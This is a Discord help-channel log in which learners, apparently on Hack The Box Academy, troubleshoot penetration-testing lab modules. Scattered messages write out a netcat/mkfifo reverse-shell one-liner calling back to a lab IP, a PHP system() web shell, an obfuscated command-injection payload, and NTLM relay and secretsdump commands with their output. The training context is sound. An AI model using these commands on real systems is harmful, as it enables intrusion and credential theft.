I'm still having trouble with this module. I can make an RDP connection, and in under a minute it crashes. I have tried Remmina instead of xfreerdp3 and nothing has changed. Once RDP crashes, the port is no longer open on the target.

Before RDP crashes:

┌──(kali㉿kali)-[~/HTB/Modules/Sliver]
└─$ nmap 10.129.205.234
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 17:11 EDT
Nmap scan report for 10.129.205.234
Host is up (0.077s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman

After RDP crashes:

┌──(kali㉿kali)-[~/HTB/Modules/Sliver]
└─$ nmap 10.129.205.234
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 17:14 EDT
Nmap scan report for 10.129.205.234
Host is up (0.052s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 6.09 seconds

I have no other options after this but to restart the target and try again. I'm on my 9th VPN change (both TCP and UDP), I've tried from Pwnbox, the target is not listening on UDP ports so trying RDP over UDP isn't an option. I'm at a loss 🙁

jolly oasis
#

I could really use some help on SQLMap Essentials > Attack Tuning > "What's the contents of table flag5? (Case #5)"
https://academy.hackthebox.com/module/58/section/526

Read the hint and was able to get a flag value, entered in the answer field and it wasn't correct. Ran the command a few times like suggested and got the same thing. Saw it was suggested to restart the target, so I did that. Re-ran my command and now there's no flag at all. Very confused.

gray yacht
jolly oasis
gray yacht
devout lily
#

Hi everyone, when i use Nmap -sA flag, when do i get a filtered or unfltered port?

gray yacht
maiden bobcat
#

Is it possible to reset Modules? Cause i want to pratice some of them again without having the answers

cloud urchin
maiden bobcat
#

ok

minor mica
#

Can I get some help please

quiet trout
quiet trout
minor mica
quiet trout
#

the index number... hmm... not sure about that one

minor mica
#

Yeah, im stuck in could pass it but I want to know

quiet trout
#

did you check inodes? is it asking about inodes was that mentioned anywhere in teh section/module?

minor mica
#

Ls -i /etc/sudoerers

#

That gives me the inodes which is the index

#

When i type that index in then it says the answer is wrong

quiet trout
#

ok ive never heard it called index before

minor mica
#

Yes, im getting annoyed lol

quiet trout
#

any difference when doing stat /etc/sudoers ?

#

i think they might mean something else man

minor mica
#

It gives the same thing but more detailed

quiet trout
#

right on

#

yeah i think they must mean something else then, hard to imagine what though

fathom pendant
#

Its the linux fundamentals module

#

I doubt they're connected to the spawned target: "Click here to spawn target"

#

Its a common confusion;
People think "spawn instance" is the target spawn

#

Intro to academy probably

#

Its the first module that loads when you create your account, but just like ToS -- people dont read that shit

minor mica
#

I figured it out I had the vpn in however I didnt log into the ssh account.

#

Is there a way to reset my test so I can start over since I figured why things wasn't qorking

minor mica
#

Oh man

fathom pendant
#

Theres no way to reset the answers

#

Its a feature thats been suggested though

minor mica
#

So how can I figure out the correct answer

fathom pendant
#

? Well if it didnt accept your answer then its not locked out

#

As far as figuring out the correct answers: utilize the tools at your disposal

minor mica
#

Yes, my biggest issue was the most tiny the the ssh lol

fathom pendant
#

Actually no. 1920x1080

quiet trout
#

rock on @minor mica , its the little things (every-single-time)

minor mica
#

Yeah could be 2 40 inch wide screen and then 4 20 inch lol

#

Just need to get back into it.

#

But tha just you everyone for assisting me

fathom pendant
minor mica
#

No its not that I didnt see it i just thought once im connected to the VPN thats all I needed to do. Lol

worldly heron
#

Doing the Service Enumeration section under the Network Enumeration with Nmap module and noticed that when I used -oA to write the output to a file, I get less information than if I don't write the output to a file. Specifically, one of the ports discovered shows more info when not writing out. Why could this be?

Using --version-trace adds the "missing" information. Was using --version-all previously

fathom pendant
#

Not sure what's missing, tbh, output just puts the output of the scan into a format

worldly heron
#

After converting the XML to HTML and looking at the reports, can see that Debug level was 0 for "missing" info using --version-all and 1 for --trace (which had the extra info in it)

rustic sage
#

Guys

#

So how I find it who did it

cloud urchin
#

Ask Discord or the police. No one here can help you.

sterile sonnet
#

I’m doing a lab in which requires me to go to event viewer under the id 4624 8/3/2022 10:23:25 and I have to put my answer in T_W____.exe and don’t know where to find it

blazing mango
#

hi

viscid timber
wooden seal
#

getting this error message when ingesting in bloodhound community edition
Using latest bloodhound-ce-python collector
reinstalled bloodhoun ce (so its all clean)
any fixes to resolve this?

iron oriole
green cypress
#

Introduction to Process Injection module within Introduction to Windows Evasion Techniques - I am getting this error?

cloud urchin
#

According to the error, a group policy is blocking it

green cypress
#

Yeah but its a Windows Antivirus bypass module pretty much, AV isn't detecting it but group policy is stopping it

#

copied the solution 1:1

#

. looks like it is to do with this

cloud urchin
#

I don't think that system is domain joined, so it could be referring to the local policy as well. You could run gpresult /h result.html and see if you can find the policy blocking it.

cloud urchin
glad flicker
wooden seal
quiet halo
#

i literally spent the last 2 days redoing my nmap notes just for them to disappear....

#

oh nvm it's back

undone cypress
#

Hello, friends. 👋
Remind me, which chat should I write to if I noticed an inaccuracy in the step-by-step solutions, what would be corrected for those who will be passing?
Thank you.

green cypress
#

Any modules or resources on HTB for segmentation testing

#

if so, what are they 🙂

gritty umbra
#

Anyone working on Dante htbpro?

grand granite
#

is there any coupon code active for subscriptions?

little trench
tawdry meteor
#

SubjectLogonId

little trench
#

how i upload images here;Please help me

acoustic owl
hexed tartan
#

Hello i stuck in module DACL Attacks II Skill Assessment Tried to connect using chisel on 1st question, but i got connection timeout, i tried troubleshoot but nothing work, any help?

little trench
#

i am trying to solve (image1) problem i write this (image2) it works but the next command gives an error (image3) in that specific module you do not optain the valid token it is given to you here(image4) Can someone please help me if posible

autumn pilot
#

You need to obtain a new token, using the expired token that was shown in the output will not work

little trench
#

i know but i can not obtain it because it is given to you from here straight up (image)

#

The response provides with a valid admin token

#

This is the very first command you run for that section in the module.

mystic stratus
#

hello all

#

so i just completed the introfuction module

#

i have 40 cubes can u guys tell em what modules shall i go with?

waxen totem
#

@long hamlet this is not general chat, please read #rules and follow #welcome

iron oriole
#

Once again, please any help or advice. I was able to finish all challenges from new Attacking AI module except Rogue Actions. Any advice how to get the flag? Where is it hidden?

proven plinth
gray yacht
hexed tartan
gray yacht
#

This is not the correct channel for this post.

gaunt goblet
#

Hi there, is there anyone completed the Nibbles - Initial Foothold section in getting started recently? I'm having problem with php reverse shell as "<?php system('id'); ?>" working perfectly fine but when i upload the reverse shell it is not connecting, i've tried in my onw machine and on attackbox. Also pentestmonkey php reverse shell didin't help either, i would be more thatn happy if someone can help

fathom pendant
blissful tapir
#

Hi, did a search on here but didn't find anything definitive on the following;
I am one answer away from finishing the Android Fundamentals course, question:
Find the UID of the application com.android.settings

I will be careful to not give away any answers here, but I have tried multiple methods, each of which yield the same UID, however this is not accepted as an answer. I suspect the UID is legitimately different from the one expected, but not sure how to proceed accordingly

fathom pendant
#

@barren wadi please don't include answers in your screenshots

barren wadi
#

ouuuu

#

im sorry but i was doing windows fundementals and i was at the last question in skill assessement and it tells me that this sid is wrong but i dont know why

#

and i was wondering if anyone knows why did i put it as a wrong group or what?

fathom pendant
gaunt goblet
barren wadi
#

i went in computer manegment and created a group called hr

fathom pendant
fathom pendant
#

interesting. because according to that screenshot, you did 😉

#

try resetting the lab and redoing the steps

barren wadi
#

okay i will but i dont know why

#

ill try again thank you

lunar flicker
#

hi folks, is anyone doing the AI Red Teamer Path? I'm stuck at "Vulnerable MCP Servers" if anyone can give me a hint..

rustic sage
#

Hi guys, I'm stuck on this question. I'm looking for the password for the ldapadmin account somewhere in the system. I'm running this command, but I didn't find the password, or if I did, I got overwhelming information. Any help?
get-ChildItem -Path .*.xml, *.txt, *.config, *.ini, *.cfg -Recurse -Force -hidden | findstr /spin "password" .

hollow wharf
#

Hi guys,
I'm currently working on the module "Active Directory Enumeration & Attacks" and i'm stuck at "Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux" exercise 2.
When i try to get the TGS i always get the KRB_AP_ERR_SKEW(Clock skew too great) error...
And since i can't install anything via apt on the attacker machine in this exercise, i really don't know, how to fix this issue...

surreal goblet
#

i did find the flag Using NSE and its scripts to that one of the services contain and did submit the answer but its not correct

static slate
#

and check for any missing characters

surreal goblet
#

i did

gray yacht
magic timber
#

Hello i'm stuck on the module "Wi-Fi Penetration Testing Basics - Skills Assessment" especially on the question 2 : crack the password, i tried everything i thought i have to do but it doesn't work, can someone contact me to give me some clues?
Thanks a lot

magic timber
#

yes that what im trying to do, but i don't know why i don't suceed to get it

#

i'm doing airodump then a deauth with aireplay but never get a handshake

gray yacht
magic timber
#

Okay

static slate
mellow light
#

and can I DM

hollow wharf
gray leaf
gray yacht
gray leaf
#

Thanks! 🙂

wind gust
#

Has anyone done the "Active Directory Trust Attacks" module "Attacking Cross Forest Trusts" having issues with kerberoasting

wind gust
gray yacht
# wind gust correct

Shouldn't be anything crazy. If you haven't already, I'd restart the env and then after it spawns, give it a couple of minutes just in case the env isn't completely spun up or configured.

wind gust
gray yacht
terse bloom
#

Hello, What host can this user access via WinRM? (just the computer name) - Active Directory Module "Privileged Access" section. I am stuck and I do not really understand why the bloodhound cypher query to look for WinRM access is not working. I cannot figure out which query allows you to view access of a specific user

blissful tapir
gray yacht
terse bloom
gray yacht
gloomy geyser
gloomy geyser
mental canopy
gloomy geyser
#

Cannot follow the text blindly to go rce. You need to write a shell bash. Check HackTheBox “Ophiuchi” to see how it was executed

hollow wharf
leaden island
#

the section says we can use certi.py to scan for the web enrollment URL of a CA host that issues the templates

#
  1. how can i do it + are there more straight forward ways ?
#
  1. when trying to do it from the attack host with a socks5 tunnel to the CA host's network, its stuck on DNS request for inlanefreight.local, how can i specify the nameserver for it ?
reef axle
#

Hello, is there any specific module designed for regex bypass.

eternal crater
#

Hellao

devout lily
#

Firewall and IDS/IPS Evasion - Medium Lab
Hi everyone, can someone help me with this exercise?

ionic kernel
#

Hey y'all

acoustic owl
#

@slow salmon This is not a hacker for hire server

eternal crater
#

Allo

#

Est ce que vous parler en Francais

fathom pendant
cold pilot
#

I'm in the same situation, any luck?

rich obsidian
#

can anyone tell me more about this "With this particular web application, our file went to status.inlanefreight.local\files\demo.aspx" I have never in all my days navigated to a url within my browser using two slashes. I know that this particular host is a windows machine, but its a website? Why am I having to put two slashes like im trying to access a folder on smb or something?

#

ah the two slashes dont show probably because its a cancellation character here. Imagine there is two slashes after local

fathom pendant
#

but yes, you are basically accessing a file - try with and without the double slash and you'll see that it isn't an accident

rich obsidian
fathom pendant
#

there's no absolute way to know, just consider that the double slash is calling a named pipe within the system

fathom pendant
#

I haven't dove into that particular subject myself, it's more of a research the tech in use to know

rich obsidian
#

a named pipe

#

I can tell already that it would be complicated to explain

devout lily
# fathom pendant UDP exists

yes of course, i'm trying every type of Nmap commans but it still doesn't work. Can i write here the command i think to be right?

fathom pendant
#

but it's not that important in the grand scheme of thing

rich obsidian
#

I cant even wrap my head around how you would use a named pipe like that

fathom pendant
#

#rules this is an ENGLISH only server

devout lily
fathom pendant
#

brother

cobalt lava
#

what are the prereqresuites to intro to penetration tester

devout lily
fathom pendant
#

s __U__burban__V__ehicle 😉

amber pawn
#

I am facing a issue in HTB academy password Attacks module in Attack LSASS section when i try to move the dump file to my attack box using smb share it failed every time could someone help me

fathom pendant
#

xfreerdp has the /drive: option to mount a share, evil-winrm has the upload/download functionality

amber pawn
#

Thank you let me try it

cold pilot
#

thanks i'll try that, i also just ran the agent on the second pivot machine as a job and that seems to have fixed it too! Start-Job in PowerShell

inland reef
#

hello

dim needle
#

hello everybody, in the Abusing HTTP Misconfigurations module and last section of web cache poisoining"Tools & Prevention" i couldnt find any header that is vulnerable however ı just detect fat get with X-HTTP-Method-Override header and when i poisioned cache it works bu i couldnt find the answer it takes quite long time can someone please give any hints

grand flax
#

Hello guys I am new to this so anyone can teach me hacking from basics please

compact patrolBOT
river grove
late panther
#

Hello everyone, I'm new to the community and new to Hacking, I'm doing the Getting Started path and I'm in the Nibbles - Privilege Escalation section, during the tutorial when we are asked to get a reverse root shell, in the text of the section there is the following example code to get it: [nibbler@Nibbles:/home/nibbler/personal/stuff$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh]
The problem is that Nibbles' machine doesn't have a sh command, it has a bash command. I realized this when I accidentally tried to update my TTY with Python 3 and I accidentally put /bin/sh instead of /bin/bash. By doing that change, I was able to get the shell as root. I spent over an hour repeating the tutorial over and over again without knowing why it failed, but it's that small detail, that is, the correct line should be:
[nibbler@Nibbles:/home/nibbler/personal/stuff$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh]. Who can be notified to correct this error in the learning tutorial? Because other new HTB Academy students might also be frustrated like me by not knowing what the error was.

hasty furnace
#

Hello beautiful people , seeking for help

Im stuck on this question on my modules :
" How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)"

tried to use this command , it looks like the most correct option , and still answer is wrong

ss -l -4 | grep -v 127 | grep “LISTEN” | wc -l

what is wrong , can't figure it out ?

proven plinth
wild sage
#

Need some help trying to run the Command 'SearchUserClearTextInformation' I keep getting an error that the command is not recognized and I've tried Importing the module and bypassing policy execution. Module is Windows Attacks & Defense: Section: Credentials in Object Properties

drifting dirge
#

Yes, but with existing exploit unfortunately. But it was my first experience with Metasploit, so not that bad 😀

alpine mural
agile anvil
#

Please anyone wanna teach me to hack web applications

drifting dirge
tranquil wren
#

Hello i am needing some help on the linux authentication process module (https://academy.hackthebox.com/module/147/section/1319). i was able to get the passwords with ||jTr|| but i am having trouble with doing so with hashcat. i have tried mutating a list, and i went through the process of unshadowing both files together, however, i just can't get the hashcat process to work. any ideas?

mellow orchid
#

What you guys use for hack the box or CTF? What’s like your go to tool that helps you automate the basics like running nmap ?

hazy grotto
dim needle
drifting dirge
river grove
teal arrow
#

Question, a lot of the active directory/linux modules in the CPTS path are about exploiting services and software that are 4+ years old, how do you find and learn about more recent vulnerabilities? Are there more recent exploits in higher tier modules?

heavy mango
dim needle
hasty furnace
hazy grotto
#

This was my first module i did before i started taking notes so i can't really help much. Copy and paste the error code and command into Chatgpt and see if it will help you

wild sage
#

Module: Windows Attacks & Defense

#

Need help with Question 3, I can't seem to get any 4771 logs after I perform the attack.

tawdry meteor
#

Hey, would mscoree.dll appear in PSInjection attacks? From my understanding it is more related to BYOL since it works on determining the version of the .NET used to compile the code

wild sage
#

to generate the 4771 log

reef axle
#

hello all,

ffuf -w common.txt -u http://IP:PORT/w2ksvrus/FUZZ.html -e .php,.html,.txt,.bak,.js -v

in this if we add .html at end of FUZZ then will it fuzz like this, admin.html, admin.html.php, admin.html.js

#

removing .html will FUZZ like this admin.html, admin.php, admin.js etc

quiet trout
#

nvm it wanted spaces instead of other separators

#

im a little impressed with myself if anyone wants to give me a pat on the back i recalled how to do all this from memory, yes the queries are easy but i havent used wireshark in over a year and i did "guess from memory" but i was right each time. to me thats more progress than the section itself.

thorn quarry
#

Tell my why i paid 450 usd , and i got hit by “take it slow It seems that you have triggered one of our rate-limiting rules.
Note that crawling and/or scanning any part of the website is not allowed.”
Your IP has been temporarily blocked.

quiet trout
#

thats prob part of the module, what section are you on? try a stealthier scan

#

take the nmap module to learn that.

#

@thorn quarry ^

#

@minor mica how we doin? still rockin?

thorn quarry
quiet trout
#

prob should issue a support ticket about it

viscid bolt
#

Working on Trust Account Attack, but when sshing into the windows machine and running tools, the output gets eaten, tried some term stuff but nothing works. If anyone has any advice on stopping the terminal from eating the output

gray yacht
viscid bolt
cobalt lava
#

what is the tier system? like tier iv tier iii etc

quiet trout
#

i think the academy calls those levels if you're comparing what you get with a subscription/cubes in the description of what Level/Tiers it offers

cobalt lava
quiet trout
#

the tier/level has to do with what you have access to when you're getting a subscription i think

fathom pendant
#

Its not really to do with subscription level

versed saffron
#

Hello, I could really use some help with the Password Attacks skills assessment.
Im not really sure how the "don't share details that could spoil anything" works as in what is allowed or not so please let me know. I did the pivot and am trying to connect to the credentials found on the initially given user's home dir but whenever i use proxychains to either run nmap (using the cheatsheet command) or connect through smb, xfreerdp, etc. it never works. Either timing out or taking forever. Any help would be greatly appreciated.

fathom pendant
#

I used ligolo-ng for my pivoting

hollow kernel
#

Do You recommend to do blodhound ad module of tier III? In the cpts

cloud urchin
#

nah

hollow kernel
#

May be to reforce aknowledge of blodhound, but may be with the ad module of cpts is enough

versed saffron
# fathom pendant I used ligolo-ng for my pivoting

Perfect thanks using ligolo worked. Over sock winrm kept failing which is really unfortunate since i was not only using a pwnbox but sock is what the module's cheatsheet said to use. I think it may need to be revised because this was very frustrating to try to figure out when it wasnt related to the content itself.

twin bronze
#

Hello

sharp notch
#

is pentest in a nutshell in the cpts path?

#

pentester job path*

#

im assuming it has info inside penetrating testing process

cloud urchin
#

Looks like no

sharp notch
#

yes im looking now trying to compare the 2

#

i think pentesting process has the details in there just worded diff

cloud urchin
#

It's in the CJCA path though

sharp notch
#

yeah thats why im like hmm

#

because it looks like some foundational info , but maybe pentester has that same foundational info or different

#

still trying to wrap my head around how my girl has fiber for 50$ and im paying 290 to optimum for 300mbps download

cloud urchin
#

One is a module that gives you an overview. The path is a lot more than that, it's 28 modules as a whole. It teaches you how to network pentest.

sharp notch
#

ahh okay

#

makes sense

#

more in depth

cloud urchin
#

much much more

sharp notch
#

was trying to pick between the 2 all day but i think pentester is gonna be the move

#

jcsa im like 43% done because of the fundamentals thats why i considered tbh

#

wyd supernuts

little terrace
#

hi im trying to do password attacks and it requires me to rdp in. but when i rdp in and try to execute 1 command (reg.exe), it just crashes the rdp session

gaunt willow
#

Also currently doing the password attacks assessment and having a very tough time mounting an SMB share. any advice?

warped sluice
#

Hi nothing else

cloud urchin
gaunt willow
#

well, the main issue is that I can enumerate it all with nxc, but then when I try to mount an SMB share it tells me the password is incorrect

#

Which doesn't make any sense whatsoever

cloud urchin
#

maybe try wrapping it in single quotes

gaunt willow
#

doesn't work

fathom pendant
#

why are you trying to mount the smb share instead of just using smbclient to access it?

#

or accessing it from the rdp session itself and copying/moving the file from there

gaunt willow
#

I’m trying to use smbclient, and xfreerdp doesn’t want to copy/paste for some reason. That’s where I’m at. But it constantly tells me I’m using the wrong creds when using smbclient, which is not true.

I’m sorry, I’m just very frustrated with how HTB does things. I am able to use the solutions text for little bumps/nudges but it’s absolutely infuriating when I go through a module, and in classic HTB style, the solution shows to use some random other tool that was never mentioned in the text. The instructions literally say to gain access to the DMZ and then use the cheat sheet for pivoting. so I do that. But, smbclient and proxy chains don’t work well together apparently. So I look in the solution for a bump, and I see this whole essay on using ligolo-ng (spelling may be wrong).

I’m completely understanding of the fact that pentesting isn’t clear cut. 100% get that. But there is some understandable expectations that the learning material and assessments will test on what was actually taught and not simply bring up random tools never previously mentioned.

#

Again, I’m not meaning that towards anyone. Just super frustrated because I’ve been stuck in this damn assessment for days, and I feel extremely defeated by stupid pieces that really aren’t even the hardest parts (or shouldn’t be, rather).

cloud urchin
#

Like I said, there are many ways. You said you were using nxc, why not just use that to upload/download?

#

are you using a vm or the pwnbox?

gaunt willow
cloud urchin
#

wrong password is a pretty straightforward error, could be something else wrong on your end.

#

so there could be a version difference in tools too. you could see if it works on the pwnbox.

gaunt willow
cloud urchin
#

well there you go, bad authorization

#

so the creds were wrong

gaunt willow
#

Have you finished this module? Any advice you can provide otherwise?

cloud urchin
#

I haven't gone through the new updated one

gaunt willow
#

Okay.

cloud urchin
#

maybe make sure to take breaks keep that mind fresh would be a tip haha

gaunt willow
#

Okay

full echo
jovial jasper
#

Hi, I am in the Command Injections modules in the Advanced Command Obfuscation section, in the Case Manipulation subchapter I am having trouble getting the following to work on the server:

$(a="WhOaMi";printf %s "${a,,}")

Trying something like: (im assuming the % character from %s might be the issue?, tried URL encoding it but doesn't seem to do much)

ip=127.0.0.1%0a$(a="WhOaMi"${LS_COLORS:10:1}printf%09%s%09"${a,,}")

This bypasses the filter but the command isn't executed, my output is:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.024 ms

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.024/0.024/0.024/0.000 ms

~~Any help would be greatly appreciated! ~~

Update: Found the solution

blissful tapir
hollow ermine
#

HTB Academy – SCCM Site Takeover II (Quest 2)
Goal: use the SCCM01$ hash to read \LAB-DC\SCCMShare\SCCMServer01\flag.txt.

Setup: ligolo working; ntlmrelayx -socks targeting 172.50.0.21; ran PetitPotam → got a session only for LAB/SCCM02$@172.50.0.21(445).
Issue: no session for 172.50.0.10 (DC); direct connect over ligolo with
smbclient.py 'LAB/SCCM01$'@172.50.0.10 -hashes ... fails.

Questions:

Should I spin up a second ntlmrelayx against 172.50.0.10 and rerun PetitPotam, or should it work directly via ligolo?

Can you confirm the exact share path is SCCMShare\SCCMServer01 on the DC?

Any tip to reliably force SCCM01$ to authenticate to the relay targeting the DC?

Thanks! 🙏

tranquil breach
#

Hello.

#

File upload skill assesment:
i can perform xxe to read local file , source code, but i don't found the way to get RCE

sweet jewel
hollow ermine
#

*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> * Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'

  • Debug mode: off
    [] (SMB): Received connection from 10.129.230.38, attacking target smb://172.50.0.21
    [
    ] (SMB): Authenticating connection from LAB/SCCM02$@10.129.230.38 against smb://172.50.0.21 SUCCEED
    [] SOCKS: Adding LAB/SCCM02$@172.50.0.21(445) to active SOCKS connection. Enjoy
    [
    ] All targets processed!
    [] (SMB): Connection from 10.129.230.38 controlled, but there are no more targets left!
    [
    ] SOCKS: Proxying client session for LAB/SCCM02$@172.50.0.21(445)
    [-] SOCKS: Don't have a relay for 172.50.0.10(445)
    [-] SOCKS: No session for LAB/SCCM01$@172.50.0.21(445) available
    [] SOCKS: Proxying client session for LAB/SCCM02$@172.50.0.21(445)
    [-] SOCKS: Don't have a relay for 172.50.0.10(445)
    [
    ] SOCKS: Proxying client session for LAB/SCCM02$@172.50.0.21(445)
    [-] SOCKS: No session for LAB/SCCM01$@172.50.0.21(445) available
    [-] SOCKS: No session for /LAB\SCCM01$@172.50.0.21(445) available
    [-] SOCKS: Don't have a relay for 172.50.0.10(445)
    [-] SOCKS: Don't have a relay for 172.50.0.10(445)
    [-] SOCKS: Don't have a relay for 172.50.0.10(445)
    [*] SOCKS: Proxying client session for LAB/SCCM02$@172.50.0.21(445)
    [-] SOCKS: Don't have a relay for 172.50.0.10(445)
    [-] SOCKS: Don't have a relay for 172.50.0.10(445)
sweet jewel
#

whats the command you ran for ntlmrelayx.py and smbclient.py?

hollow ermine
#

python3 examples/ntlmrelayx.py -t 172.50.0.21 -smb2support -socks --no-http-server

sweet jewel
#

it looks like a syntax problem with -socks, you need to be quite explicit with the username and ip

#

you can run ntlmrelayx.py with --interactive if you really don't want to deal with that

#

eh? what are you trying to achieve?

hollow ermine
#

The access to the shares

sweet jewel
#

your ntlmrelayx.py will wrap whatever connection you use with SCCM02$, you can't chain that with the hash of SCCM01$

#

you should be coercing authentication from SCCM01$ to yourself, then using that connection to access \\LAB-DC\SCCMShare

hollow ermine
#

if i try with SCCM01$ it doesnt work, let me see u the error

#

This one work: sudo proxychains secretsdump.py 'LAB/SCCM02$'@172.50.0.21 -no-pass
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra

[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.50.0.21:445 ... OK
[] Service RemoteRegistry is in stopped state
[
] Starting service RemoteRegistry
[] Target system bootKey: 0x99bae75d092c3b9d979cf712fb4fcfde
[
] Dumping local SAM hashes (uid:rid:lmhash:nthash)

#

But if i try with SCCM01 it doesnt

sweet jewel
hollow ermine
#

I know...so i have to restart the ntlmrelay server for SCCM01 instead SCCM02?

sweet jewel
#

ye

hollow ermine
#

I tryed but it doesnt work: python3 examples/ntlmrelayx.py -t 172.50.0.10 -smb2support -socks --no-http-server

#

[-] SOCKS: Don't have a relay for 172.50.0.10(445)

#

I've been stuck on this for 3 days, trying every possible approach, but nothing seems to work.

scarlet rain
#

Hi, in HTB CBBH - Web Attacks Module - Chaining IDOR Vulnerabilities

With our new role, we may also perform mass assignments to change specific fields for all users, like placing XSS payloads in their profiles or changing their email to an email we specify. Try to write a script that changes all users' email to an email you choose.. You may do so by retrieving their uuids and then sending a PUT request for each with the new email.

I have problem making this scripts, has anyone succeeded in making it?

scarlet rain
bitter hazel
#

Can i get help with a ctf ?

untold knot
#

Module Name: Linux Fundamentals
Section Name: System Information
Question you're struggling with: Connecting with ssh
Generally what you've tried:

  1. I checked the connection to the host with a ping command -> I got a response.
  2. Connection with ssh to host with -v to see whats going on -> Connection closed

The following is the output as described above:

ping -v -c 4 10.129.40.207
ping: sock4.fd: 3 (socktype: SOCK_DGRAM), sock6.fd: 4 (socktype: SOCK_DGRAM), hints.ai_family: AF_UNSPEC

ai->ai_family: AF_INET, ai->ai_canonname: '10.129.40.207'
PING 10.129.40.207 (10.129.40.207) 56(84) bytes of data.
64 bytes from 10.129.40.207: icmp_seq=1 ttl=63 time=29.1 ms
64 bytes from 10.129.40.207: icmp_seq=2 ttl=63 time=36.3 ms
^C
--- 10.129.40.207 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 29.104/32.720/36.337/3.616 ms

1/2

foggy snow
static shadow
#

I need help solving this question form HTB academy

https://academy.hackthebox.com/module/136/section/1291

Its from file upload attacks , I tried upload XSS payload and XXE payloads , it did got successfully uploaded but i dont know how to trigger the uploaded file , Also i dont think the payload is working as there is no output in source code

untold knot
untold knot
autumn pilot
static shadow
#

Hey !

I tried the given payload in the module and updated the file:///flag.txt , it did got uploaded but nothing in source code

#

thats what im lacking , i cant confirm , all i get is file is uploaded but that can be false positive right ?

#

can you guide me how can i confirm or trigger the payload ? i dont have file location as well where my file is being uploaded

tranquil breach
#

you can try first with well-known file like /etc/passwd.
After you upload a good payload, you can ge the result by inspecting the web page ( at location where your image is displayed)

static shadow
#

okay , thanks for the help im trying to solve it since yesterday. If i get stuck i will DM you prayge

covert light
foggy snow
#

Module Name: Dynamic Port forwarding with ssh and SOCKS Tunneling
Link: https://academy.hackthebox.com/module/158/section/1426
Question: I have been trying for a while now to tunnel using ssh with the following command ssh -D 9050 STIMP, which seems to work fine, however I just can't seem to tunnel through to the internal IP 172.16.5.129, I have tried multiple things and config's, and the one time I did manage to run an nmap scan with proxychains all the ports appeared as filtered. The goal is to tunnel through ssh and connect to the remote host using xfreerdp but I just can't establish a connection.

safe star
#

Just used ligolo to reach the other network and tcp-pivot implants to connect the c2 back since ligolo can’t redirect sliver traffic

covert light
#

and it actually worked

#

I love french people

clever furnace
#

hi all! is it possible to reset the answers to boxes after you have completed them?

covert light
barren apex
#

@slate zinc I just have a quick question
I'm trying to replace a body string, but for some reason it is not working
I also tried Match String = ip and Match String = 1
and both didn't work

#

idk what happened but it's working now -_-

#

I had to add /ping to the URL

slate zinc
#

ah ok cool

barren apex
#

but it sucks cuz now the other Replacer isn't working cuz the URL doesn't match

#

Thought I can use regex to match all endpoints under a specific host, but that also doesn't work

cerulean gazelle
#

what is this?

#

how do i start?

barren apex
# cerulean gazelle how do i start?

wrong channel buddy, #general is where you need to ask this type of questions
but to answer you quick, this is HTB academy, you can either buy cubes or get a subscription and start studying

cerulean gazelle
fathom pendant
#

@tranquil breach don't spoil information for skill assessments and modules above tier 0

compact patrolBOT
tranquil breach
#

is it normal to get stucke on exercice like this, if you understood all the content of a module ?

weak kindle
#

Has anyone of completed NTML Relay attack? Please reply to this message .. I will ping you!

fathom pendant
tranquil breach
#

Yahh . I already found the file location.
I found where my uploaded files are stored, but what next!
I can't exec code with my uploaded file even if I can request them

fathom pendant
#

experiment then with different things, finding where they're uploaded is only part of the problem

#

you'll need to try all the techniques to properly get it to work

foggy snow
gray yacht
frosty anchor
#

Im on "Hacking Wordpress" skill assesment and Im struggling with even just the first question of "whats the wordpress version number" Ive tried curl + grep and Ive tried manually looking at the source code yet I cant seem to find it, the only meta, link, and script tags are shown in the screenshot and from the HTB module those are the primary ways to find the version number

#

the fact that trying to look it up has no forum posts or write ups makes me assume its something im doing very wrong Managed to figure it out on my own but I dont get why it would work like this || found "blog.inlanefreight.local" in the source code and added it to my DNS since it mentioned youll need to know that and through that page I found the version info ||

orchid scaffold
#

why doesnt the password work tho?

orchid scaffold
frosty anchor
#

just wanted to be safe

tropic prawn
#

Hello World 🤝

dull solar
#

Having a long questionaire or exercise at the end like they did in the Windows Fundamentals would be nice for Linux Fundamentals, imo. I don't feel content.

acoustic owl
fathom pendant
orchid scaffold
frosty anchor
#

im actually so lost I answered most questions but this one is really confusing me, I found LFI I exploited it fine but I cant figure out how to "download a file containing a flag value"

#

for hacking wordpress skill asssesment

#

theres 38 vulnerabilties identified am I supposed to try all one by one?

fathom pendant
#

The hint is in the question unauthenticated file download

frosty anchor
#

i just went through and manually checked every one marked vulnerable and said unauthenticated and i still couldnt find it

#

not saying youre wrong or anything ofc im just super lost

#

everything im seeing is saying look at exploit-db but searching any of the plugins give no results

#

bruh

#

i looked up on exploitdb with the "-" instead of space so i didnt see any

#

i woudlve solved this 40min ago 😭

unkempt ore
#

hello htb, did anyone solve the final assesment in "Advanced XSS and CSRF Exploitation", i have a payload that should work if a moderator come visit the link but i don't find how to send him the link

jovial jasper
civic coral
#

